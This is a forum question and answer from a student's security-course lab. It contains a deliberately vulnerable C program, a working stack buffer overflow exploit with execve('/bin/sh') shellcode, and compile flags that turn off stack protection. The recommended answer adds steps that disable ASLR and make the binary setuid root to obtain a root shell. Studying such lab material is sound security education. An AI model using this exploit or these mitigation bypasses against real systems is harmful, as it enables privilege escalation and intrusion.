Buffer Overflow - SegFaults in regular user


Question

Below is my code, both the vulnerable program (stack.c) and my exploit (exploit.c). This code works on a pre-packaged Ubuntu 9 that the prof sent out for Windows users (I had a friend test it on his computer), but on Ubuntu 12 that I run on my iMac, I get segfaults when I try and do this in a normal user.

Here is the stack program:

//stack.c
#include <stdio.h>
#include <string.h>   /* strcpy was used without its header */

int bof(char *str)
{
    char buffer[12];

    //BO Vulnerability: unbounded copy into the 12-byte buffer
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char* argv[])
{
    char str[517];

    FILE *badfile;
    badfile = fopen("badfile", "r");
    if (badfile == NULL) {
        perror("badfile");
        return 1;
    }

    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}

And the exploit:

//exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 350

/* Shellcode placed at the end of the buffer */
char code[]=
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;

/* Returns the current stack pointer (32-bit x86 only). The original fell off
   the end of the function with the value left in %eax, which is undefined
   behaviour; an output operand makes the return explicit. */
unsigned long get_sp(void)
{
    unsigned long sp;
    __asm__("movl %%esp,%0" : "=r"(sp));
    return sp;
}

int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    long *a_ptr, ret;
    int i;

    int offset = DEFAULT_OFFSET;
    int codeSize = sizeof(code);
    int buffSize = sizeof(buffer);

    if (argc > 1) offset = atoi(argv[1]); /* allows for command line input */

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, buffSize);

    /*----------------------BEGIN FILL BUFFER----------------------*/

    ret = get_sp() + offset;
    printf("Return Address: 0x%lx\n", get_sp());
    printf("Address: 0x%lx\n", ret);

    /* First 300 bytes: the guessed return address, repeated */
    a_ptr = (long *) buffer;
    for (i = 0; i < 300; i += 4)
        *(a_ptr++) = ret;

    /* Shellcode after the NOP sled, near the end of the buffer */
    for (i = 486; i < codeSize + 486; ++i)
        buffer[i] = code[i - 486];

    buffer[buffSize - 1] = '\0';
    /*-----------------------END FILL BUFFER-----------------------*/

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    if (badfile == NULL) {
        perror("badfile");
        return 1;
    }
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    return 0;
}

To compile these within Ubuntu 12 I used:

gcc -o stack -fno-stack-protector -g -z execstack stack.c
gcc -o exploit exploit.c

Again, it works in a root user, just not a regular user;

Anyways, this is due at midnight and I limped my way through the rest of the assignment with this restriction, but I'd much rather complete it properly if someone has a suggestion. Figured I'd call in the experts before throwing in the towel. I'm looking to see why this code will not work in a normal user (as it should, and does on older versions of Ubuntu) but does work in a root user. What do I need to change to make this work in the normal user also?
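A hardened counterpart to the stack.c above, added here as an example and not part of the question or its answer: the copy into the 12-byte stack buffer is bounded and oversized input is rejected instead of overwriting the return address, and the file read is checked for errors and NUL-terminated (the original fread leaves str unterminated, so strcpy can read past it). The names bof_bounded and read_badfile are assumed.

```c
/* Hardened version of the question's stack.c (added example, not the poster's code). */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   12    /* same stack buffer size as the original bof() */
#define INPUT_SIZE 517   /* same input size as the original main() */

/* Copies str into a fixed 12-byte stack buffer only if it fits, terminator
   included. Returns 1 on success, 0 if the input would overflow the buffer.
   memchr is limited to BUF_SIZE bytes so an unterminated input is never
   scanned past what could fit. */
int bof_bounded(const char *str)
{
    char buffer[BUF_SIZE];
    const char *end = memchr(str, '\0', BUF_SIZE);
    if (end == NULL) {
        return 0;                      /* no terminator within 12 bytes: refuse */
    }
    size_t len = (size_t)(end - str);
    memcpy(buffer, str, len + 1);      /* bounded copy, terminator included */
    (void)buffer;
    return 1;
}

/* Reads at most out_size - 1 bytes from path into out and NUL-terminates it.
   Returns the number of bytes read, or -1 if the file cannot be opened. */
long read_badfile(const char *path, char *out, size_t out_size)
{
    FILE *f = fopen(path, "r");
    if (f == NULL) {
        return -1;
    }
    size_t n = fread(out, 1, out_size - 1, f);   /* leave room for '\0' */
    fclose(f);
    out[n] = '\0';
    return (long)n;
}

int main(void)
{
    char str[INPUT_SIZE];
    long n = read_badfile("badfile", str, sizeof str);
    if (n < 0) {
        perror("badfile");
        return 1;
    }
    if (!bof_bounded(str)) {
        fprintf(stderr, "input of %ld bytes rejected: exceeds %d-byte buffer\n",
                n, BUF_SIZE - 1);
        return 1;
    }
    printf("Returned Properly\n");
    return 0;
}
```

With this version the 517-byte badfile produced by exploit.c is rejected rather than executed, regardless of whether ASLR, stack canaries or a non-executable stack are in effect; those kernel and compiler mitigations only make exploitation harder, while the bounded copy removes the overflow itself.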

Recommended answer

I just ran the code that you provided on an Ubuntu 12.04 VM and it worked fine. My guess is that you didn't turn off ASLR. Try it again with ASLR disabled, either by

sudo su
echo 0 > /proc/sys/kernel/randomize_va_space
exit

or by

setarch `uname -i` -R ./stack

Of course, in order for it to spawn a root shell you will need to first do:

sudo chown root:root stack
sudo chmod u+s stack

Hope this helps ...
